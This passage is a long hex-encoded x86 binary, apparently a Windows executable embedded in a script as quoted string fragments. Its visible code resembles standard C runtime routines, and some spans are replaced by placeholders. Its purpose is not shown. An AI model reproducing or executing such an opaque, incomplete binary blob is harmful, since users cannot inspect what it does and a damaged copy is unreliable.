'85befffff598b450883c30483c7104889450875b256e845efffff595f5e5b' \
'5dc3558bec568b750885f60f848700000053578b3df0a0410056ffd7837e7' \
'8007405ff7678ffd78b868000000085c0740350ffd7837e7c007405ff767c' \
'ffd78b868800000085c0740350ffd76a06588d5e1c894508817bf89468420' \
'0740c833b007407ff33ffd78b4508837bf400740e837bfc007408ff73fcff' \
'd78b450883c3104889450875ce8b8e9c00000081c1b000000051ffd75f5b8' \
'bc65e5dc36a0c68702d4200e832210000e87e0900008bf08b0dc46a420085' \
'4e707422837e6c00741ce8660900008b706c85f675086a20e8e7280000598' \
'bc6e844210000c36a0ce837260000598365fc00ff35fc6942008d466c50e8' \
'2100000059598bf08975e4c745fcfeffffffe805000000ebbc8b75e46a0ce' \
'<KEY>' \
'28578938e8defcffff5985f6741b56e8bdfeffff833e0059750f81fe006a4' \
'200740756e84ffdffff598bc75eeb0233c05f5dc3833dc88042000075126a' \
'fde85003000059c705c88042000100000033c0c3558bec8b45082da403000' \
'0742683e804741a83e80d740e48740433c05dc3a194b541005dc3a190b541' \
'005dc3a18cb541005dc3a188b541005dc3558bec83ec108d4df06a00e8a4c' \
'4ffff8b45088325bc7442000083f8fe7512c705bc74420001000000ff1528' \
'a24100eb2c83f8fd7512c705bc74420001000000ff1524a24100eb1583f8f' \
'c75108b45f0c705bc744200010000008b4004807dfc0074078b4df8836170' \
'fdc9c3558bec538b5d085657680101000033ff8d73185756e839edffff33c' \
'00fb7c8897b04897b0889bb1c0200008bc1c1e1100bc18d7b0cabababbf70' \
'66420083c40c2bfbb9010100008a04378806464975f78d8b19010000ba000' \
'100008a04398801414a75f75f5e5b5dc3558bec81ec20050000a160634200' \
'33c58945fc53568b7508578d85e8faffff50ff7604ff152ca2410033dbbf0' \
'001000085c00f84f00000008bc3888405fcfeffff403bc772f48a85eefaff' \
'ffc685fcfeffff208d8deefaffffeb1f0fb651010fb6c0eb0d3bc7730dc68' \
'405fcfeffff20403bc276ef83c1028a0184c075dd53ff76048d85fcfaffff' \
'50578d85fcfeffff506a0153e89f74000053ff76048d85fcfdffff5750578' \
'd85fcfeffff5057ffb61c02000053e84e73000083c4408d85fcfcffff53ff' \
'76045750578d85fcfeffff506800020000ffb61c02000053e82673000083c' \
'4248bcb0fb7844dfcfaffffa801740e804c0e19108a840dfcfdffffeb10a8' \
'027415804c0e19208a840dfcfcffff88840e19010000eb07889c0e1901000' \
'0413bcf72c1eb576a9f8d9619010000582bc28bcb8985e0faffff03d103c2' \
'8985e4faffff83c02083f819770a804c0e19108d4120eb1183bde4faffff1' \
'9770c804c0e19208d41e08802eb02881a8b85e0faffff418d96190100003b' \
'<KEY>' \
'<KEY>' \
'6a20e86a250000598bc6e8c71d0000c36a0de8ba220000598365fc008b776' \
'88975e43b3570634200743685f6741a56ff15f0a0410085c0750f81fe7066' \
'4200740756e8b0eaffff59a1706342008947688b35706342008975e456ff1' \
'518a14100c745fcfeffffffe805000000eb8e8b75e46a0de8bd23000059c3' \
'6a1068b02d4200e80b1d000083cfffe8540500008bd8895de4e83dffffff8' \
'b7368ff7508e8cffcffff598945083b46040f846e0100006820020000e8da' \
'230000598bd885db0f845b010000b9880000008b45e48b70688bfbf3a533f' \
'6893353ff7508e84701000059598bf8897d0885ff0f850d0100008b45e4ff' \
'7068ff15f0a0410085c08b45e475158b486881f970664200740a51e8e3e9f' \
'fff598b45e489586853ff1518a141008b45e4f64070020f85f1000000f605' \
'c46a4200010f85e40000006a0de88e210000598975fc8b4304a3a87442008' \
'b4308a3ac7442008b831c020000a3a47442008bce894de083f9057d10668b' \
'444b0c6689044db074420041ebe88bce894de081f9010100007d0d8a44191' \
'888816864420041ebe88975e081fe000100007d108a841e19010000888670' \
'65420046ebe5ff3570634200ff15f0a0410085c07513a1706342003d70664' \
'200740750e824e9ffff59891d7063420053ff1518a14100c745fcfeffffff' \
'e805000000eb318b7d086a0de83c22000059c3eb2383ffff751e81fb70664' \
'200740753e8e7e8ffff59e89c080000c70016000000eb0233ff8bc7e8af1b' \
'0000c3558bec83ec20a16063420033c58945fc5356ff75088b750ce82dfbf' \
'fff8bd859895de085db750e56e889fbffff5933c0e9b20100005733ff8bcf' \
'894de48bc73998786342000f84f20000004183c030894de43df000000072e' \
'681fbe8fd00000f84d000000081fbe9fd00000f84c40000000fb7c350ff15' \
'20a2410085c00f84b20000008d45e85053ff152ca2410085c00f848c00000' \
'068010100008d46185750e864e8ffff895e0433db4383c40c89be1c020000' \
'395de8764f807dee008d45ee74218a500184d2741a0fb6080fb6d2eb06804' \
'c0e1904413bca76f683c00280380075df8d461ab9fe000000800808404975' \
'f9ff7604e816faffff83c40489861c020000895e08eb03897e0833c00fb7c' \
'88bc1c1e1100bc18d7e0cabababe9bb000000393dbc744200740b56e886fa' \
'ffffe9ae00000083c8ffe9a900000068010100008d46185750e8bde7ffff8' \
'b55e483c40c6bd2308d82886342008945e48038008bc874358a410184c074' \
'2b0fb6190fb6c0eb1781fb0001000073138a877463420008441e190fb6410' \
'1433bd876e583c10280390075ce8b45e44783c0088945e483ff0472b88b5d' \
'e053895e04c7460801000000e857f9ffff83c40489861c0200006a068d4e0' \
'c8d927c6342005f668b026689018d52028d49024f75f156e83cfaffff5933' \
'c05f8b4dfc5e33cd5be86fbdffffc9c3558bec51668b4508b9ffff0000663' \
'bc1750433c0c9c3b900010000663bc1730e0fb7c8a1506e42000fb70448eb' \
'1c8d45fc506a018d4508506a01ff1530a24100f7d81bc02345fc0fb7c00fb' \
'74d0c23c1c9c3a190684200c36a0868d02d4200e8101900008b750885f60f' \
'8400010000837e24007409ff7624e85de6ffff59837e2c007409ff762ce84' \
'ee6ffff59837e34007409ff7634e83fe6ffff59837e3c007409ff763ce830' \
'e6ffff59837e40007409ff7640e821e6ffff59837e44007409ff7644e812e' \
'6ffff59837e48007409ff7648e803e6ffff59817e5cd0bc41007409ff765c' \
'e8f1e5ffff596a0de8c31d0000598365fc008b7e6885ff741a57ff15f0a04' \
'10085c0750f81ff70664200740757e8c4e5ffff59c745fcfeffffffe85700' \
'00006a0ce88a1d000059c745fc010000008b7e6c85ff742357e85cf6ffff5' \
'93b3dfc694200741481ff006a4200740c833f00750757e8e6f4ffff59c745' \
'fcfeffffffe81e00000056e86ce5ffff59e845180000c204008b75086a0de' \
'8971e000059c38b75086a0ce88b1e000059c3558beca19068420083f8ff74' \
'27568b750885f6750e50e8600700008bf0a190684200596a0050e86f07000' \
'0595956e896feffff5e5dc356e8120000008bf085f675086a10e87c1f0000' \
'598bc65ec35657ff15c0a04100ff35906842008bf8e8180700008bf05985f' \
'6754768bc0300006a01e8281e00008bf0595985f6743356ff3590684200e8' \
'10070000595985c074186a0056e8250000005959ff1500a24100834e04ff8' \
'906eb0956e89de4ffff5933f657ff1534a241005f8bc65ec36a0868f82d42' \
'00e81c1700008b7508c7465cd0bc41008366080033ff47897e14897e706a4' \
'358668986b8000000668986be010000c746687066420083a6b8030000006a' \
'0de81f1c0000598365fc00ff7668ff1518a14100c745fcfeffffffe83e000' \
'0006a0ce8fe1b000059897dfc8b450c89466c85c07508a1fc69420089466c' \
'ff766ce8ddf2ffff59c745fcfeffffffe815000000e8d3160000c333ff478' \
'b75086a0de8241d000059c36a0ce81b1d000059c3e82f1f0000e8da1c0000' \
'85c07508e86300000033c0c36844034100e8ae05000059a39068420083f8f' \
'f74e35668bc0300006a01e8f61c00008bf0595985f6742d56ff3590684200' \
'e8de050000595985c0741b6a0056e8f3feffff5959ff1500a24100834e04f' \
'f890633c0405ec3e80400000033c05ec3a19068420083f8ff740e50e86605' \
'0000830d90684200ff59e9561b0000558bec8325c07442000083ec105333d' \
'b43091dc86a42006a0ae8fe83000085c00f840e01000033c98bc3891dc074' \
'42000fa2568b35c86a4200578d7df083ce028907895f04894f0889570cf74' \
'5f8000010008935c86a4200741383ce04c705c0744200020000008935c86a' \
'4200f745f800000010741383ce08c705c0744200030000008935c86a42006' \
'a0733c9580fa28d75f08906895e04894e0889560cf745f4000200008b35c4' \
'744200740983ce028935c474420033c033c90fa28d7df08907895f04894f0' \
'889570c817df447656e75755f817dfc696e65497556817df86e74656c754d' \
'33c04033c90fa28907895f04894f0889570c8b45f025f03fff0f3dc006010' \
'074233d60060200741c3d7006020074153d50060300740e3d600603007407' \
'3d70060300750983ce018935c47442005f5e33c05bc9c3558bec81ec28030' \
'000a16063420033c58945fc837d08ff577409ff7508e8d80300005983a5e0' \
'fcffff006a4c8d85e4fcffff6a0050e80fe2ffff8d85e0fcffff8985d8fcf' \
'fff8d8530fdffff83c40c8985dcfcffff8985e0fdffff898ddcfdffff8995' \
'd8fdffff899dd4fdffff89b5d0fdffff89bdccfdffff668c95f8fdffff668' \
'c8decfdffff668c9dc8fdffff668c85c4fdffff668ca5c0fdffff668cadbc' \
'fdffff9c8f85f0fdffff8b45048985e8fdffff8d45048985f4fdffffc7853' \
'0fdffff010001008b40fc8985e4fdffff8b450c8985e0fcffff8b45108985' \
'e4fcffff8b45048985ecfcffffff15e4a141008bf88d85d8fcffff50e8220' \
'600005985c0751385ff750f837d08ff7409ff7508e8e5020000598b4dfc33' \
'cd5fe881b7ffffc9c3558bec8b4508a3c87442005dc3558becff35c874420' \
'0ff15f8a1410085c074035dffe0ff7518ff7514ff7510ff750cff7508e811' \
'000000cc33c05050505050e8c9ffffff83c414c36a17e87181000085c0740' \
'56a0559cd29566a01be170400c0566a02e875feffff56e87a05000083c410' \
'5ec3e877fbffff85c07506b83c6c4200c383c00cc3558bec56e8e4ffffff8' \
'b4d08518908e820000000598bf0e80500000089305e5dc3e843fbffff85c0' \
'7506b8386c4200c383c008c3558bec8b4d0833c03b0cc5d06a42007427408' \
'3f82d72f18d41ed83f81177056a0d585dc38d8144ffffff6a0e593bc81bc0' \
'23c183c0085dc38b04c5d46a42005dc3558bec568b750885f674138b550c8' \
'5d2740c8b4d1085c9751933c0668906e889ffffff6a165e8930e810ffffff' \
'<KEY>' \
'f85d275df668906e854ffffff6a22ebc9558bec568b750883fee0776f5357' \
'a19c7d420085c0751de8054400006a1ee85e44000068ff000000e8cc19000' \
'<KEY>' \
'85ff75266a0c5b3905f87f4200740d56e8ed0000005985c075a9eb07e8e4f' \
'effff8918e8ddfeffff89188bc75f5beb1456e8cc00000059e8c9feffffc7' \
'000c00000033c05e5dc3558bec8b451485c07e0b50ff7510e832d0ffff595' \
'9ff751cff751850ff7510ff750cff7508e81768000083c4185dc3cccccccc' \
'cccccccccccccccccccc518d4c24082bc883e10f03c11bc90bc159e9aa680' \
'000518d4c24082bc883e10703c11bc90bc159e9946800006a0868202e4200' \
'e828110000be006a42003935fc694200742a6a0ce854160000598365fc005' \
'668fc694200e842f0ffff5959a3fc694200c745fcfeffffffe806000000e8' \
'31110000c36a0ce88817000059c3558becff35d0744200ff15f8a1410085c' \
'0740fff7508ffd05985c0740533c0405dc333c05dc3558bec8b4508a3d074' \
'42005dc383255481420000c3558beca1e08042003305606342007407ff750' \
'8ffd05dc35dff25d0a14100558beca1e4804200330560634200ff75087404' \
'ffd05dc3ff1574a041005dc3558beca1e8804200330560634200ff7508740' \
'4ffd05dc3ff15cca141005dc3558beca1ec804200330560634200ff750cff' \
'<KEY>' \
'<KEY>' \
'468935446c420033c085f60f9fc05ec9c3565768a8b94100ff157ca041008' \
'b35a4a041008bf868c4b9410057ffd633056063420068d0b9410057a3e080' \
'4200ffd633056063420068d8b9410057a3e4804200ffd633056063420068e' \
'4b9410057a3e8804200ffd633056063420068f0b9410057a3ec804200ffd6' \
'330560634200680cba410057a3f0804200ffd63305606342006820ba41005' \
'7a3f4804200ffd63305606342006838ba410057a3f8804200ffd633056063' \
'42006850ba410057a3fc804200ffd63305606342006864ba410057a300814' \
'200ffd63305606342006884ba410057a304814200ffd6330560634200689c' \
'ba410057a308814200ffd633056063420068b4ba410057a30c814200ffd63' \
'3056063420068c8ba410057a310814200ffd633056063420068dcba410057' \
'a314814200ffd6330560634200a31881420068f8ba410057ffd6330560634' \
'2006818bb410057a31c814200ffd63305606342006834bb410057a3208142' \
'00ffd63305606342006854bb410057a324814200ffd63305606342006868b' \
'b410057a328814200ffd63305606342006884bb410057a32c814200ffd633' \
'05606342006898bb410057a334814200ffd633056063420068a8bb410057a' \
'330814200ffd633056063420068b8bb410057a338814200ffd63305606342' \
'0068c8bb410057a33c814200ffd633056063420068d8bb410057a34081420' \
'0ffd633056063420068f4bb410057a344814200ffd63305606342006808bc' \
'410057a348814200ffd63305606342006818bc410057a34c814200ffd6330' \
'5606342005fa3508142005ec3558becff7508ff153ca241005dc3558becff' \
'7508ff1530a1410050ff153ca141005dc3558bec6a00ff153ca24100ff750' \
'8ff1538a241005dc3558bec8b450885c07515e885faffffc70016000000e8' \
'0bfaffff83c8ff5dc38b40105dc3558bec837d08007426568b750cf7460c0' \
'0100000741856e8ebbbffff81660cffeeffff33c05989461889068946085e' \
'5dc3558bec568b750856e89effffff50e8d9650000595985c00f848600000' \
'057e891baffff83c0203bf0750433ffeb0fe881baffff83c0403bf0756633' \
'ff47ff0578744200f7460c0c0100007554833cbdd47442000053bb0010000' \
'0752553e8bf130000598904bdd474420085c075138d46146a028946088906' \
'58894618894604eb128b0cbdd4744200894e08890e895e18895e04814e0c0' \
'211000033c0405beb0233c05f5e5dc3558bec81ec80020000a16063420033' \
'c58945fc8b450853568b750c578b7d14ff75108985d0fdffff33c08bd88d8' \
'd88fdffff89b5f0fdffff89bde4fdffff8985b0fdffff899de8fdffff8985' \
'c8fdffff8985d8fdffff8985ccfdffff8985b8fdffff8985c4fdffffe8a0b' \
'0ffffe827f9ffff8985acfdffff8b85d0fdffff85c00f84cb0a0000f6400c' \
'40756350e873feffff598bc883f9ff741983f9fe74148bd183e21fc1f805c' \
'1e206031485e0744200eb05ba506c4200f642247f0f858f0a000083f9ff74' \
'1983f9fe74148bc183e11fc1f805c1e106030c85e0744200eb05b9506c420' \
'0f64124800f85620a000085f60f845a0a00008a0e33c08bd08995e0fdffff' \
'8985dcfdffff8985bcfdffff8985a8fdffff888deffdffff888db4fdffff8' \
'4c90f84040a00008bb59cfdffff8b85f0fdffff408985f0fdffff85d20f88' \
'e90900008d41e03c58770f0fbec10fbe8018bc410083e00feb0233c08bbdb' \
'cfdffff0fbebcc738bc41008bc7c1f80489bdbcfdffff8bbde4fdffff8985' \
'bcfdffff83f8070f8787090000ff2485501b410033c0838dd8fdffffff8bd' \
'88985a0fdffff8985b8fdffff8985c8fdffff8985ccfdffff899de8fdffff' \
'8985c4fdffffe94c0900000fbec183e820744683e803743983e808742f484' \
'8741d83e8038b85f0fdffff0f852d09000083cb08899de8fdffffe91f0900' \
'0083cb04899de8fdffffe90b09000083cb01ebf081cb80000000ebe883cb0' \
'2ebe380f92a752f8b0783c70489bde4fdffff8985c8fdffff85c00f89db08' \
'000083cb04f7d8899de8fdffff8985c8fdffffe9c50800008b85c8fdffff6' \
'bc00a8985c8fdffff0fbec18b8dc8fdffff83c1d003c8898dc8fdffffe99d' \
'08000033c08985d8fdffffe99008000080f92a752b8b0783c7048985d8fdf' \
'fff85c08b85f0fdffff89bde4fdffff0f8972080000838dd8fdffffffe966' \
'0800008b95d8fdffff6bd20a0fbec183c2d003d08995d8fdffffe93e08000' \
'080f949744580f96874388b85f0fdffff80f96c741480f9770f852c080000' \
'81cb00080000e9f7feffff80386c750c4081cb00100000e9e6feffff83cb1' \
'0e9defeffff83cb20e9e4feffff8b85f0fdffff8a003c36751c8bbdf0fdff' \
'ff807f013475108bc783c00281cb00800000e9aefeffff3c33751c8bbdf0f' \
'dffff807f013275108bc783c00281e3ff7fffffe98efeffff3c640f84aa07' \
'00003c690f84a20700003c6f0f849a0700003c750f84920700003c780f848' \
'a0700003c580f848207000033c08985bcfdffffeb0233c08985c4fdffff8d' \
'8588fdffff500fb6c150e8e4adffff595985c074388d85e0fdffff50ffb5d' \
'0fdffffffb5b4fdffffe8b90700008b8df0fdffff83c40c8a01418885b4fd' \
'ffff898df0fdffff84c00f84620700008d85e0fdffff50ffb5d0fdffffffb' \
'5b4fdffffe88107000083c40ce9fc0600000fbec183f8640f8fcd0100000f' \
'845102000083f8530f8fed000000747c83e84174104848745648487408484' \
'80f851805000080c120c785a0fdffff01000000888deffdffff8b85d8fdff' \
'ff83cb40ba00020000899de8fdffff8db5f4fdffff8995c0fdffff85c00f8' \
'932020000c785d8fdffff06000000e980020000f7c3300800000f859e0000' \
'0081cb00080000899de8fdffffe98d000000f7c330080000750c81cb00080' \
'000899de8fdffff8b95d8fdffffb9ffffff7f83faff74028bca8b3783c704' \
'89bde4fdfffff7c3100800000f845304000085f675068b354c6c4200c785c' \
'4fdffff010000008bc685c9740f33d249663910740783c00285c975f32bc6' \
'd1f8e93c04000083e8580f84b00200004848747083e8070f8427ffffff484' \
'80f852404000083c70489bde4fdfffff7c31008000074300fb747fc506800' \
'0200008d85f4fdffff508d85dcfdffff50e85961000083c41085c0741fc78' \
'5b8fdffff01000000eb138a47fc8885f4fdffffc785dcfdffff010000008d' \
'b5f4fdffffe9c50300008b0783c70489bde4fdffff85c074338b700485f67' \
'42c0fbf00f7c3000800007414992bc2d1f8c785c4fdffff01000000e98a03' \
'000033c9898dc4fdffffe97d0300008b35486c420056e816dbffff59e96b0' \
'3000083f8700f8fe30100000f84cf01000083f8650f8c5903000083f8670f' \
'8e4bfeffff83f869746483f86e742583f86f0f853d030000c785dcfdffff0' \
'800000084db795b81cb00020000899de8fdffffeb4d83c70489bde4fdffff' \
'8b7ffce8bec2ffff85c00f84000500008b85e0fdfffff6c3207405668907e' \
'b028907c785b8fdffff01000000e97a04000083cb40899de8fdffffc785dc' \
'fdffff0a000000f7c300800000750cf7c3001000000f848e0100008b0f83c' \
'70889bde4fdffff8b7ffc33f6e9ae010000751180f9677556c785d8fdffff' \
'01000000eb4a3bc27e088bc28985d8fdffff3da30000007e378db85d01000' \
'057e89b0c0000598a8deffdffff8985a8fdffff85c0740a8bf089bdc0fdff' \
'ffeb0ac785d8fdffffa30000008bbde4fdffff8b0783c708898580fdffff8' \
'b47fc898584fdffff8d8588fdffff50ffb5a0fdffff0fbec1ffb5d8fdffff' \
'89bde4fdffff50ffb5c0fdffff8d8580fdffff5650ff35786e4200ff15f8a' \
'14100ffd08bfb83c41c81e780000000742183bdd8fdffff0075188d8588fd' \
'ffff5056ff35846e4200ff15f8a14100ffd0595980bdeffdffff67751c85f' \
'f75188d8588fdffff5056ff35806e4200ff15f8a14100ffd05959803e2d0f' \
'8528feffff81cb00010000899de8fdffff46e916feffffc785d8fdffff080' \
'000006a07eb1c83e8730f84dffcffff48480f8496feffff83e8030f856b01' \
'00006a27588985b0fdffffc785dcfdffff1000000084db0f897cfeffff045' \
'1c685d4fdffff308885d5fdffffc785ccfdffff02000000e95efeffff83c7' \
'0433f689bde4fdfffff6c3207411f6c34074060fbf47fceb0e0fb747fceb0' \
'8f6c340740a8b47fc998bc88bfaeb058b4ffc8bfef6c340741c3bfe7f187c' \
'043bce7312f7d913fef7df81cb00010000899de8fdfffff7c300900000750' \
'28bfe8b95d8fdffff85d2790533d242eb1483e3f7b800020000899de8fdff' \
'<KEY>' \
'<KEY>' \
'9d9cfdffff8985c0fdffff8bfa83f9397e06038db0fdffff8b95d8fdffff8' \
'80e8b8dc0fdffff4eebb08b9de8fdffff8d45f32bc6468985dcfdfffff7c3' \
'00020000743685c07405803e30742d4eff85dcfdffffc60630eb2185f6750' \
'<KEY>' \
'bdb8fdffff000f8586010000f6c3407435f7c3000100007409c685d4fdfff' \
'f2deb1af6c3017409c685d4fdffff2beb0cf6c3027411c685d4fdffff20c7' \
'85ccfdffff010000008bbdc8fdffff2bbddcfdffff8b85ccfdffff2bf8f6c' \
'30c751e8d85e0fdffff50ffb5d0fdffff576a20e8000200008b85ccfdffff' \
'83c410ffb5acfdffff8d8de0fdffff51ffb5d0fdffff508d85d4fdffff50e' \
'80302000083c414f6c308741df6c30475188d85e0fdffff50ffb5d0fdffff' \
'576a30e8b501000083c41083bdc4fdffff008b85dcfdffff747d85c07e798' \
'bce488985c0fdffff0fb701506a068d45f4508d85a4fdffff83c10250898d' \
'9cfdffffe8655c000083c41085c0753f3985a4fdffff7437ffb5acfdffff8' \
'd85e0fdffff50ffb5d0fdffff8d45f4ffb5a4fdffff50e8720100008b85c0' \
'fdffff8b8d9cfdffff83c41485c07596eb2883caff8995e0fdffffeb23ffb' \
'5acfdffff8d8de0fdffff51ffb5d0fdffff5056e83801000083c4148b95e0' \
'fdffff85d27823f6c304741e8d85e0fdffff50ffb5d0fdffff576a20e8e50' \
'0000083c4108b95e0fdffff8b85a8fdffff85c0741550e8dcceffff33c059' \
'8985a8fdffff8b95e0fdffff8b85f0fdffff8a08888deffdffff888db4fdf' \
'fff84c90f8508f6ffff8bc280bd94fdffff005f5e5b740a8b8d90fdffff83' \
'6170fd8b4dfc33cde822a5ffffc9c3e843eeffffc70016000000e8c9edfff' \
'f83c8ffebc98bff8113410079114100ad114100001241005c124100691241' \
'00b5124100f7134100558bec8b550cf6420c407406837a0800742dff4a047' \
'80e8b028a4d088808ff020fb6c1eb0d0fbe45085250e898240000595983f8' \
'ff75088b45108308ff5dc38b4510ff005dc3558bec568b750c85f67e1e578' \
'b7d1457ff75104eff7508e89effffff83c40c833fff740485f67fe75f5e5d' \
'c3558bec568b7518578b7d108b06f6470c408945187410837f0800750a8b4' \
'd148b450c0101eb4e832600538b5d0c85db7e408b4514508b4508570fb600' \
'504be84bffffff8b451483c40cff45088338ff7514833e2a751350576a3fe' \
'<KEY>' \
'cccccccccc68c01c410064ff35000000008b442410896c24108d6c24102be' \
'0535657a1606342003145fc33c5508965e8ff75f88b45fcc745fcfeffffff' \
'8945f88d45f064a300000000c38b4df064890d00000000595f5f5e5b8be55' \
'd51c3cccccccccccccc558bec83ec18538b5d0c56578b7b08333d60634200' \
'c645ff00c745f4010000008b078d731083f8fe740d8b4f0403ce330c30e86' \
'2a3ffff8b4f0c8b470803ce330c30e852a3ffff8b4508f64004660f85d000' \
'00008945e88b45108945ec8d45e88943fc8b430c8945f883f8fe0f84ee000' \
'0008d04408d40048b4c87048b1c878d04878945f085c9747b8bd6e8a24c00' \
'<KEY>' \
'7410000741f68c4c74100e8535a000083c40485c0740e6a01ff7508ff15c4' \
'c7410083c4088b55088b4d0ce8854c00008b450c8b55f839500c741068606' \
'34200568bc8e8864c00008b450c89580c8b0783f8fe7475eb668a4dff8bc3' \
'895df883fbfe0f855dffffff84c97447eb21c745f400000000eb18837b0cf' \
'e74366860634200568bcbbafeffffffe83f4c00008b0783f8fe740d8b4f04' \
'03ce330c30e849a2ffff8b4f0c8b570803ce330c32e839a2ffff8b45f45f5' \
'e5b8be55dc38b4f0403ce330c30e822a2ffff8b4f0c8b470803ce330c30e8' \
'12a2ffff8b4df08bd68b4908e8b54b0000cc6a6468402e4200e8fffdffff6' \
'a0be8380300005933db895dfc6a406a205f57e8a004000059598bc8894ddc' \
'85c9751b6afe8d45f0506860634200e86c4a000083c40c83c8ffe95502000' \
'0a3e0744200893dd080420005000800003bc8733166c74104000a8309ff89' \
'5908806124808a4124247f88412466c741250a0a89593888593483c140894' \
'<KEY>' \
'<KEY>' \
'<KEY>' \
'<KEY>' \
'<KEY>' \
'<KEY>' \
'<KEY>' \
'0c50ff15aca14100ff46088b55e08b4de447897dd48b45d8408945d883c20' \
'48955e0eb86890cb5e0744200013dd08042008b04b5e07442000500080000' \
'3bc8732466c74104000a8309ff8959088061248066c741250a0a895938885' \
'93483c140894ddcebcc468975d08b4de4e906ffffff895dd483fb030f8db8' \
'0000008bf3c1e6060335e07442008975dc833eff7413833efe740e0fbe460' \
'40c80884604e98c000000c646048185db75056af658eb0a8d43fff7d81bc0' \
'83c0f550ff15cca041008bf883ffff744585ff744157ff1580a0410085c07' \
'436893e25ff00000083f80275080fbe46040c40eb0b83f80375090fbe4604' \
'0c0888460468a00f00008d460c50ff15aca14100ff4608eb220fbe46040c4' \
'0884604c706feffffffa15c81420085c0740a8b0498c74010feffffff43e9' \
'3cffffffc745fcfeffffffe80800000033c0e8acfbffffc36a0be80302000' \
'059c36a1068602e4200e851fbffff33ff897de46a01e88500000059217dfc' \
'6a035e8975e03b35608142007d53a15c8142008b04b085c07444f6400c837' \
'41050e8e85700005983f8ff740447897de483fe147c29a15c8142008b04b0' \
'83c02050ff159ca14100a15c814200ff34b0e853c8ffff59a15c814200832' \
'4b00046eba2c745fcfeffffffe80b0000008bc7e812fbffffc38b7de46a01' \
'e86601000059c3558bec568b7508833cf5906c420000751356e8710000005' \
'985c075086a11e87d02000059ff34f5906c4200ff15e8a041005e5dc35657' \
'be906c42008bfe538b1f85db7417837f0401741153ff159ca1410053e8cfc' \
'7ffff8327005983c70881ffb06d42007cd85b833e00740e837e04017508ff' \
'36ff159ca1410083c60881feb06d42007ce25f5ec36a0868802e4200e82cf' \
'affff833d9c7d4200007518e8102c00006a1ee8692c000068ff000000e8d7' \
'01000059598b7d08833cfd906c420000755b6a18e8fa000000598bf085f67' \
'50fe80ce7ffffc7000c00000033c0eb416a0ae81affffff598365fc00833c' \
'fd906c420000751568a00f000056ff15aca141008934fd906c4200eb0756e' \
'816c7ffff59c745fcfeffffffe80900000033c040e8e0f9ffffc36a0ae837' \
'00000059c35657be906c4200bfe0754200837e04017512893e68a00f0000f' \
'f3683c718ff15aca1410083c60881feb06d42007cdd33c05f405ec3558bec' \
'8b4508ff34c5906c4200ff15eca041005dc3558bec565733f66a00ff750cf' \
'f7508e8775600008bf883c40c85ff7527390530774200761f56ff1500a141' \
'<KEY>' \
'3558bec5356578b3d3077420033f6ff7508e8b8e6ffff8bd85985db752585' \
'<KEY>' \
'<KEY>' \
'8bf8595985ff752c39450c7427390530774200761f56ff1500a141008d86e' \
'<KEY>' \
'518d45fc506894bc41006a00ff1588a0410085c0741768acbc4100ff75fcf' \
'f15a4a0410085c07405ff7508ffd0c9c3558becff7508e8c3ffffff59ff75' \
'08ff1584a04100cc558bece80a2a0000ff7508e8622a00005968ff000000e' \
'8b0000000cc6a016a016a00e84001000083c40cc36a016a006a00e8310100' \
'0083c40cc3558bec833dc480420000741968c4804200e8405300005985c07' \
'40aff7508ff15c480420059e8b152000068e4a2410068cca24100e8c00000' \
'00595985c075505657685a584100e8c1b3ffff59bea0a24100bfc8a24100e' \
'b0b8b0685c07402ffd083c6043bf772f1833db8804200005f5e741b68b880' \
'4200e8da5200005985c0740c6a006a026a00ff15b880420033c05dc3558be' \
'c6a006a01ff7508e88d00000083c40c5dc3566a00ff15f4a141008bf056e8' \
'74e6ffff56e8a4e3ffff56e8932b000056e828bdffff56e8e354000056e81' \
'd36000083c4185ee91ee7ffff558bec568b7508eb0b8b0685c07402ffd083' \
'c6043b750c72f05e5dc3558bec568b750833c0eb0f85c075108b0e85c9740' \
'2ffd183c6043b750c72ec5e5dc36a08e804fcffff59c36a08e85ffdffff59' \
'c36a1c68a02e4200e8adf6ffff6a08e8e6fbffff598365fc00833d4877420' \
'0010f84c9000000c7053c774200010000008a4510a238774200837d0c000f' \
'859c000000ff35c08042008b35f8a14100ffd68bd8895dd485db7474ff35b' \
'c804200ffd68bf8895de4897de0897ddc83ef04897ddc3bfb72576a00ff15' \
'f4a14100390774ea3bfb7247ff37ffd68bf06a00ff15f4a141008907ffd6f' \
'f35c08042008b35f8a14100ffd68945d8ff35bc804200ffd68b4dd8394de4' \
'75053945e074ae894de48bd9895dd48945e08bf8eb9c68fca2410068e8a24' \
'100e8d5feffff59596804a341006800a34100e8c4feffff5959c745fcfeff' \
'ffffe820000000837d10007529c70548774200010000006a08e84cfcffff5' \
'9ff7508e869fdffff837d100074086a08e836fcffff59c3e8d0f5ffffc355' \
'8bec6a006a00ff7508e8c2feffff83c40c5dc36a1468c02e4200e86af5fff' \
'f8b7d0883fffe7510e87ee2ffffc70009000000e9b900000085ff0f88a100' \
'00003b3dd08042000f83950000008bc7c1f8058945e08bdf83e31fc1e3068' \
'b0485e07442000fbe44030483e001747457e8ef5400005933f68975fc8b45' \
'e08b0485e0744200f644030401742857e8e45500005950ff1508a1410085c' \
'07508ff15c0a041008bf08975e485f67418e8c7e1ffff8930e8f4e1ffffc7' \
'000900000083ceff8975e4c745fcfeffffffe80a0000008bc6eb218b7d088' \
'b75e457e8fc55000059c3e8c5e1ffffc70009000000e84be1ffff83c8ffe8' \
'd6f4ffffc36a1068e02e4200e884f4ffff8b750883fefe7518e864e1ffff8' \
'32000e890e1ffffc70009000000e9ad00000085f60f888d0000003b35d080' \
'42000f83810000008bdec1fb058bfe83e71fc1e7068b049de07442000fbe4' \
'4380483e001746356e804540000598365fc008b049de0744200f644380401' \
'7413ff7510ff750c56e85f00000083c40c8bf8eb16e822e1ffffc70009000' \
'000e8e3e0ffff83200083cfff897de4c745fcfeffffffe80a0000008bc7eb' \
'298b75088b7de456e82255000059c3e8b7e0ffff832000e8e3e0ffffc7000' \
'9000000e869e0ffff83c8ffe8f4f3ffffc3558becb8f01a0000e8014b0000' \
'a16063420033c58945fc8b45088b4d0c33d2578bfa898540e5ffff898d44e' \
'5ffff89bd3ce5ffff89952ce5ffff395510750733c0e9d707000085c9751f' \
'e84ce0ffff2138e879e0ffffc70016000000e8ffdfffff83c8ffe9b407000' \
'053568bc8c1f9058bf083e61fc1e606898d30e5ffff8b0c8de074420089b5' \
'14e5ffff8a5c0e2402dbd0fb80fb02740580fb01752b8b4510f7d0a801751' \
'ce8f0dfffff2138e81de0ffffc70016000000e8a3dfffffe94c0700008b85' \
'40e5fffff6440e0420740d6a02525250e84855000083c410ffb540e5ffffe' \
'8954b00005985c00f84180300008b8530e5ffff8b0485e0744200f6440604' \
